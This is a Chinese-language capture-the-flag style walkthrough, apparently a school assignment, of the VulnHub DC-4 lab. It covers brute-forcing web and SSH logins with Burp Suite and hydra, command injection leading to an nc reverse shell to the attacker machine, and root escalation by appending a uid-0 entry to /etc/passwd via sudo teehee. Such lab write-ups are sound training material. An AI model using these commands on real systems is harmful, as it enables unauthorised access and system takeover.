DC-4解析

发表于 更新于 分类于 本文字数: 1.8k 阅读时长 ≈ 3 分钟

这个是学校作业哦
下载地址:https://www.vulnhub.com/entry/dc-4,313/

环境配置

攻击机:kali
靶机:DC-4
网络链接均为Nat模式

相关知识与工具

burpsuite (爆破 监听 数据包更改)
hydra(爆破用工具)
teehee提权

具体过程

照例
arp-scan -l //发现同网段设备
nmap -p- -A [指定的ip地址] //扫描开放的端口并套用脚本
1
既然开放了80端口 那就访问看看
2
是个登陆页面 说是admin信息系统登陆
我们用burpsuite爆破密码试试
调整firefox与burpsuite的proxy设定 我们开启监听 send to intruder
3
用攻击类型Cluster bomb来爆破 字典选择kali中自带的/usr/share/john/password.lst

坑:本来想用rockyou.txt的 行数太多常常导致burpsuite的崩溃

注意该lst文件前面会有几行注释 选中后点击左边的remove即可
因为使用的是Cluster bomb需要给两个payload都加上内容
我们切换payload set继续导入词库
4
ok了 点击右上角按钮开始攻击
嫌速度慢的可以在Resource pool中更改线程
5
经过极其漫长的等待
结果出来了
账号名为admin 密码为happy
6
7
我们用这套账号密码登陆进入网站
网站里面有一些命令可以执行 但都是固定的
8
我们用burpsuite抓包 尝试修改命令
9
我们把命令改成ipconfig
可以看到照样成功运行了
既然运行命令可行 那就利用nc(瑞士军刀)反弹shell吧
在kali端运行nc -lnvp 1234 //于1234端口开始监听
在burpsuite中将命令改为nc [kali的ip地址] [端口] -e /bin/sh //反弹shell
点击send 成功反弹
10
利用python -c 'import pty;pty.spawn("/bin/bash")'优化交互页面
11
在根目录的home目录下使用ls -alR递归显示所有目录与隐藏文件
在jim目录底下发现名为old-passwords.bak的文件
联系一开始端口扫描中开放的22端口
我们需要尝试登陆ssh服务
至于如何把该文件中的内容传回来 直接复制粘贴即可
账号名为jim 密码目录使用复制粘贴的密码目录
工具为hydra
12
hydra -l [用户名] -P [密码字典目录] [服务名://ip地址]
我们稍等片刻 结果出来了
[22][ssh] host: 192.168.246.142 login: jim password: jibril04
13
登陆完毕 嘻嘻
一进来系统就说you have mail
那我们找找这封邮件在哪里

find [寻找范围] -name [想找的文件名称] 2>/dev/null
2>/dev/null 不输出报错

14
发现在**/var/mail**目录里边有一封信件
(大意:jim 我这周要去休假 老板叫我给你我的密码 免得有要紧事 拜拜)
有了charles的账号密码 我们切换一下账号
15
成功进入 我们sudo -l查看该用户的sudo权限
发现他可以以root权限免密码执行 /usr/bin/teehee
那就通过teehee提权的方式来获取权限

参考:teehee提权
teehee是个小众的linux编辑器 如果有sudo权限 可以利用其来提权
核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su admin就可以登录到admin用户,这个用户因为uid为0,所以也是root权限

我们安装教程 输入echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
随后便能不使用密码su admin
flag自然在/root目录之下
16
成功!

总结

知识点比较少 短小精悍的靶机
那我们下次再见!